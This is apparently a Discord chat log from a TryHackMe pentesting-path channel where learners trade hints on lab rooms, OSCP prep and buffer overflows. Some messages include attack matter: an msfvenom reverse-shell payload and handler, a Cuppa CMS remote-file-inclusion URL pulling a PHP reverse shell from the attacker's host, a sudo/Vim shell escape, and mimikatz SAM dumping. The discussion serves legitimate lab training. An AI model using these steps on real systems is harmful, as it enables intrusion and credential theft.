you could also you wfuzz or ffuf to d othe same thing

okay

I had the same issue i'm not sure what was up ended up doing it on burp .I specified Login=Login:Incorrect and it just said everything was valid on hydra 🤷

Yes I tried different error msg at the end of my cmd but wasn't working

I prefer to use cmd line than gui

so im not so burp

For those having difficulty with buffer overflows, would a live stream covering Brainpan be of use to everyone?

probably too advanced for me at the moment but would certainly love to drop in and watch or catch that vod!

Have you ever done any BoF's before?

not really, I did the bof1 room and the one on codcaper if that one counts but am interested and will spend the time to learn it especially for the oscp but that is still 6+ months out for me

So I try to use Ruby when I can, which makes it a whole ton easier.

I went over brainpan about a week ago

might be good to see it from someone elses point of view tho

working on privesc not sure why it's not working like in walktrough

can I ask someone for clue?

@glass sparrow which room is that?

@glass sparrow which room is that?
@bronze zenith brainpan

@glass sparrow have you found a file which you can sudo without a password?

@glass sparrow have you found a file which you can sudo without a password?
@bronze zenith yes I have

so now just use it to read a manual page for a commad

and use Vim command inside of it to spawn a shell

just like walktrough in the internet right?

yup

https://mav3n.io/post/brainpan_1/
this one is good

I got reverse shell, but when I type id my reverse shell is closed

listening on [any] 9002 ...
10.10.114.192: inverse host lookup failed: Unknown host
connect to [10.11.5.213] from (UNKNOWN) [10.10.114.192] 42298
id
root@kali:~#

ah

WHat kind of reverse shell are you trying?

I'm gonna do a live stream of this later I think.

WHat kind of reverse shell are you trying?
@rancid vine linux

for windows I get cmd, but unable to have proper shell

Which one?

So the Windows shell naturally doesn't work because it's running Wine on the Linux machine, and you need a proper linux shell.

Which one?
@rancid vine can I dm you?

I don't think we are necessarily going to spoil anything here if you want to ask here.

let me try again

i've rooted hackpark but the last question asks about the original install time, i can't find this can someone let me know what/where it is?

finally rooted brainpan

msfvenom -p linux/x86/shell/reverse_tcp

and listen with

use exploit\multi\handler
set payload linux/x86/shell/reverse_tcp

Thanks for the spoiler @rocky narwhal

i used a regex to search the winpeas output for the time/data format specified in the answer but none of them work 🤔

@glass sparrow write with | Spoiler Tag |

@frigid star Have a look at systeminfo command in a standard command prompt.

I'll be live in 45 minutes at https://www.twitch.tv/themayor11 to cover Brainpan and how you can use Ruby to exploit buffer overflow vulnerabilities. The associated guide is here for you to follow along. Hope to see everyone soon! https://www.cybersecpadawan.com/2020/05/tryhackme-brainpan-ruby-exploitation-no.html

If you’re going to follow along you’ll need to have “Pry”, which should be available in the apt repository.

See you in a few. Starting up now.

Thanks to everyone who hung out today! Hopefully you were able to learn something. 🙂

it was great, thanks @rancid vine

You're very welcome.

hey guys, im stuck at https://tryhackme.com/room/skynet , task# 3-4 , I finally managed to understand so I grab a || php reverse shell || and im sending this || shell.php || file through the exploit || Cuppa CMS RFI || The problem is, as soon as send || http://10.10.136.154//45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://tunn0IP:8080/shell.php? || my nc gets a connection and then close it right away, why ?

oh hang on, I think I understand why ..

Alright, there was a misconfiguration line in my || shell.php|| file ... now it works

i used a regex to search the winpeas output for the time/data format specified in the answer but none of them work 🤔
@frigid star got the same problem. Sysinfo could be helpfull

@hexed cloak yeah aha i got it now, didn't really understand the question at the time but got it now :D

@graceful nexus released? did you mean you submitted it?

because it's not public yet

I submitted it and its waiting review

But meanwhile you can deploy it as invite only

So you can already work on it, I hope soon it will be published

It's an epic machine

In which case, what's the point in the review process?..

Well I want it to be public not private

Should be accessible for all

Not just the ones who get invited

^^

The job of the review process is to determine whether a prospective room is suitable to be released publicly. That is for us (and ultimately the platform owners) to determine, not the creator.

Releasing the private link as a workaround kinda makes a mockery of that, no?

If it's considered a mockery shouldn't the share function be disabled than until machine is approved?

No offense but its letteraly called 'share'

That's there primarily because the site is also used by teachers who don't want their material to be publicly available. It's also used for the testers to join, or for you to share it with any friends who you want to try it.

It's not really there as a "Hey everyone, my room hasn't been tested yet, but ignore that and join anyway!"
Kind of a matter of context 🙂

Yea I'm just Sharing the link temporary for people to try

Not as a replacement for publication

😋

And if, heaven forbid, it doesn't pass review?

Than I will do my best to adjust it according to the reviewers feedback until it does

(And until that point we're left with a link, posted in the public discord, to a room that shouldn't yet be publicly released, no?)

Ok I'll remove it

Had no clue it was against ToS

Not sure about the ToS, but it's definitely not really appropriate for the discord. Thank you though 🙂

We will get it reviewed soon -- I think Dan is on it 😄

Oki ^^

@chrome valve once its reviewed u should give it a try, i think you'll love it

Well it's official now, Just received my email saying I passed OSCP

😮 PogChamp @final vault. Nice one dude!

I rolled the OSCP path without looking what other paths exist. Can I read about the other paths somehow? I only seem to be able to view info abou OSCP once I've enrolled it.

you can leave and re-enroll in paths whenever you want

@sleek glade On the sidebar, do you see "Learning Paths"? Click it and at the top corner it says "Leave path"

@vague torrent Ok i'll try to leave it temporarily then. Thanks. I hope my progress does not get lost or something. I just registered 2 hours ago so new to the site.

@vague torrent it worked just fine to enter / leave paths 🙂

Well it's official now, Just received my email saying I passed OSCP
@final vault congrats.. how was the exam bro? how was it compared to THM OSCP PATH?

Hello everyone ! I'm having trouble in the bof1 (buffer overflows) box (in order to complete brainstorm after), i understood the first exemple with integer buffer overflow but I'm really having a bad time trying to overwrite function pointer, anyone for a tip ? ^^'

task 7?

Hello everyone ! I'm having trouble in the bof1 (buffer overflows) box (in order to complete brainstorm after), i understood the first exemple with integer buffer overflow but I'm really having a bad time trying to overwrite function pointer, anyone for a tip ? ^^'
@litchi.pi#9313 I skip bof1 since it x64 and brainstorm is x86.

@ember jay Yep exactly

Well I wanna learn buffer overflows, no matter if x86 or x64

same here

whats the issue?

I see, perhaps another one can help you.

Well I wanna learn buffer overflows, no matter if x86 or x64
@litchi.pi#9313

isn't bof1 the absolute beginner buffer overflows box ?

it is

even i did task 7 😛

still stuck on 8 tho

@ember jay When I overflow the buffer, I can't write to pointer properly, i tried "\x00" type binary of the function address i got after modifying the code, tried alphabetical representation, but at best it doesn't change the pointer at all, sometimes it just goes into a far address, worst can be that it gets 12 bytes long instead of 6

I struggle to find the relation behind what happend and what I do x')

do you know pwntools?

for python?

not really needed actually

hold on im booting it up

do you use radare?

nope what's this ?

ok just saw radare2 seams powerfull

you might want to do radare room first

you'll need to debug the program

to find out where you can overwrite the pointer

radare2 and reverse engineering rooms are good starters

well I got the address 0x400557 of the special function, I just don't know how to overwrite it properly

how did you get that address?

Just printf("%p") the pointer

Ok understood

the "\x05" doesn't pass in stdin s binary

it does as characters "" then "x" then "0", then "5"

\x05 is a hex char

Yep but i thought with stinput with gets function it would translate the \x thing into a binary intepretation of the following 2 digits as if they were hex formatted

so I managed to get it work with echo -e

just managing little bugs now ^-^ Hope it'll be fine

My god just did it

Thank you anyway ! 😄

https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666

Hello everyone. I am on the Kenobi box, I cannot get smbget to work. I know I am supposed to download a file, but I get "Can't open log.txt: File exists" and then, "Failed to download /log.txt: File exists". Does anyone know how to solve it? TIA!

Hello. I'm in Brainstorm box and i'm stuck, I can't run the chatserver.exe, I installed a Windows 7 virtual machine and run the program but It only spawns a little window and shuts down inmediatelly, Do I need to install something else in the windows machine?

@hazy fog I can't remember if this Brainpan or Brainstorm but if you got your file from an FTP server, make sure to grab both files...

Yes I have both, the .dll file and still won't run

Run it from the command line, not by double clicking it.

See if that works.

:c

Now It works, I don't know if it was meant to be like this, but I learned something new

I just set transfer type to binary

binary name.exe

and the get

get name.exe

waaaw useful room

How many ports does the flag -p-400 scans

I wrote all the ports because -p- does that and the 400 will be ignored

but I get wrong answer
someone knows why?

That is not how it works @vital acorn
Nice idea though

What does the man page say?

scan all ports

That's for -p-

Look again 🙂

@vital acorn

but I asked about -p- 🙂

You asked about -p-400

If you wanted -p- then you already have your answer

Easiest thing here is probably just to try it and see what the output is 🤷‍♂️

An inquisitive mind goes a long way in this field

https://tenor.com/view/spanish-monty-python-expects-unexpected-sass-gif-5284798

....

Hello,
Can anybody tell me when should one go for a certification like oscp.
I am fairly new in cybersecurity.
I have done a few easy rooms in tryhackme and few easy challenges and boxes in hackthebox.

OSCP is not for beginners at all. it's for high intermediate/advanced levels

as a beginner, don't worry about certs too much now

but eJPT would be a safe bet if you really need one

^

@bronze zenith Thank you.

Hello guys
I am doing the vulunversity

I opened burp
I intercepted the request and send it to intruder in the payload I uploaded the txt file that contains all the extensions that are shown in the example to the payload "Payload Optons simple list"

and in positions i choosed sniper
and I took all the dollar signs and put them only on the file extension file$.png$

and I started the attack

but I got status 200 on all of them

and even when I checked the response for .phtml it shows me "Extension not allowed "

why?

@vital acorn Check your requests, do you notice anything strange in your filename?

yes

yes

no

no

it get some weird charcters instead of .

@royal drum

yes, it is url encoding the .

@jovial lynx so is it fine?

shall i do something?

why it's not working

try moving the . outside the $ (and change your list)

better yet, at the bottom the payloads tab, uncheck the Payload Encoding option

either should work

Has anyone did the THM new windows privesc room?

The one TCM made? Yep.

Good for OSCP ?

If you are a winprivesc noob, yes definitely

privesc is what kicked my ass when I took OSCP the most

it's really well done

Do you have OSCP @kind panther?

No I failed that shit lol

But I took it and got rekt

Ah 😅

I probably learned more in 90 days of lab than I did in a 4 year degree though

Good to know

I am taking OSCP in two weeks. I have finished the THM OSCP path. Are there anymore THM boxes that would help with OSCP?

I just joined THM so I wouldn't know 😕

How have you done in the OSCP boxes?

I know maybe 2 or 3 genius people on discord that passed OSCP without breaking around 20 boxes. And they are generally long time pentesters professionally

Hey, can someone tell me what the OSCP path is like? Is it worth? Go into detail please, I’m on the edge of buying pro

It's a good path. Good mixture of self study and pointed directions to help you understand where you should be headed.

The path here is good if you have or will have access to the PWK materials as a lot of the rooms contain topics that they teach you in the course. So you can read the course, do the room and then the labs as well, it's good additional practice on the topic(s) you need

The THM labs are significant more stable than the overpriced labs in PWK. And you aren’t left feeling completely lost and unguided here like you are there.

tRy hArDeR sometimes just doesn't cut it

@cloud flicker
Aren't the rooms the same thing as labs?

no, my understanding is the labs are all connected and you can pivot among certain network of labs (correct me if i'm wrong)

Yeah the PWK labs are like a simulated network

And things from one lab machine might be useful for another down the line, etc etc

guys this cours is good or not

https://www.udemy.com/course/ethical-hacking-kali-linux/?couponCode=HACKING9

Is this really an #offensive-pentesting-path related question?

Anyways, I wouldn't buy it. Anyone peddling dual booting Kali with a USB has completely lost my attention.

any one have malware analysis material

or megaprimers

Here's a firehose list but it does have a mix of material and tools https://github.com/rshipp/awesome-malware-analysis

Not sure why that's being asked here though, you’re not going to be doing anything like that in OSCP

Curious, has anyone completed Alfred recently? I have a System shell and not seeing root.txt in the expected location of C:\Windows\System32\config... #offensive-pentesting-path

I have reset the box twice, and it is not showing up.

you need to migrate to a process that has permission to view the file

Ohhhh ok, sweet. Thank you. I thought because I was "nt authority\system" that I would be able to see it.

Oh geez, it says it right there in the #4 question of privesc. I blame lack of sleep! lol

why i can't see oscp-path on the site?

its changed to Offensive Pentesting i think

ah

For future reference, is this the best place to ask questions about specific rooms in the OSCP (Offensive Pentesting) Path....?

Hi, I've a question about Buffer Overflow Room Task 8, it's broken?

I've tried everything and can't get the shell...

I'm having the same problem, I managed to get a similar exploit working on a different room but this one isn't working at all. tried everything I can think off 😦

hey, can you use google at oscp?

Yes, you're allowed to use google

has anyone done GameZone without sqlmap and metasploit?

You could probably figure out the SQLi for it, but that would be tedious and take forever to trial and error.

You might be able to guess the parameters I guess.

https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/

Here's an article on how you can achieve it.

Can someone confirm if the "Offensive Pentesting" path is the same as the OSCP path? I see the same image but seems like the description and title changed

Can someone confirm if the "Offensive Pentesting" path is the same as the OSCP path? I see the same image but seems like the description and title changed
@slim summit It is the same yes, just with a new name/description

@spark iron Awesome! Thanks!

We changed the path because it's applicable to a lot of different scenarios

and the aim is that people use it to prep for various different security related thingd :))

Thank goodness for that. OSCP shouldn't be considered the only way into the field. 🙂

Plus I can imagine OffSec probably end up getting funny with y'all about it

Being as they have to rely on everyone else to prepare people for their exams, I'm sure they don't mind.

Alfred was the first room I wasn't able to complete without Metasploit, due to needing to migrate to a process to access a file. Does anyone have any resources on how you can do this without Metasploit?

The only think I was able to find was https://resources.infosecinstitute.com/poor-mans-process-migration-windows

If you want to continue doing manually https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter/92893#92893

Thank you...I read that, but wasn't sure how to do the API calls...I will roll up my sleeves and dig in to figure that out.

It's probably like everything else, it is intimidating until you actually do it and find out it isn't so bad. lol

Yeah, wish I could help more but haven't tried doing this manually myself

No worries at all, just appreciate you reminding me of that.

@terse perch you can actually do it without metasploit.

I was able to do it yesterday, but it's gonna take some creativity.

You can do it without token manipulation as well.

Are you going to do a video on it by any chance? @rancid vine

stream replay?

check his twitch

Oh, did it get streamed already?

Awesome, thank you

i am not sure

I'll check

👍

I haven't done Alfred in that manner. But I could.

I can give you the low and dirty here if you want.

I literally spent hours trying to do it and only found one way that worked.

I was able to do everything without Metasploit, using Juicy Potato

I just couldn't figure out the process migration part

Oh ok. I didn't go that route.

I was able to use mimikatz in a reverse shell to impersonate, but couldn't get anywhere with it. In the end I:

||lsadump::sam and Rdesktop'd in.||

Or xfreerdp'd in

Oh interesting....and you were able to go in with the process in questions privileges?

Can bypass UAC by running as administrator in the GUI

Ohhhhhh yes, ok that makes sense

Can't do that from a command line.

Usually

So I literally just opened the file.

I am going to go back through some of the OSCP materials around bypassing UAC and see if that allows a bypass in this instance from the cmd line

I doubt they intended someone like me to go to that length.

It does not from what I remember.

I tried that.

haha but that is what it's about lol